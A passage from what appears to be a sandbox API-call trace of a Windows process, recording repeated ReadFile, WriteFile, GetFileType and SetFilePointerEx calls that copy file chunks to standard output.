nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] GetFileType (hFile=0x50) returned 0x1 [0136.879] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.879] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 
0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.880] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.880] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) 
returned 1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] GetFileType (hFile=0x50) returned 0x1 [0136.880] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.880] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.881] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.881] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.881] GetFileType (hFile=0x50) returned 0x1 [0136.881] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.882] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.882] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.882] GetFileType (hFile=0x50) returned 0x1 [0136.882] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.883] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.883] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] GetFileType (hFile=0x50) returned 0x1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.883] WriteFile (in: hFile=0x50, lpBuffer=0x2aee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, 
lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.883] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aee54*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeea4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aeef4*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aef44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef44*, lpNumberOfBytesWritten=0x2adfe8*=0x50, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aef94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aef94*, lpNumberOfBytesWritten=0x2adfe8*=0x50, 
lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] WriteFile (in: hFile=0x50, lpBuffer=0x2aefe4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adfe8, lpOverlapped=0x0 | out: lpBuffer=0x2aefe4*, lpNumberOfBytesWritten=0x2adfe8*=0x20, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.884] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adfd4 | out: lpNewFilePointer=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=4) returned 0x58 [0136.884] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.884] _get_osfhandle (_FileHandle=1) returned 0x50 [0136.884] GetFileType (hFile=0x50) returned 0x1 [0136.884] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.885] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.886] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile (in: hFile=0x58, lpBuffer=0x2aee04, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adff4, lpOverlapped=0x0 | out: lpBuffer=0x2aee04*, lpNumberOfBytesRead=0x2adff4*=0x200, lpOverlapped=0x0) returned 1 [0136.887] ReadFile 
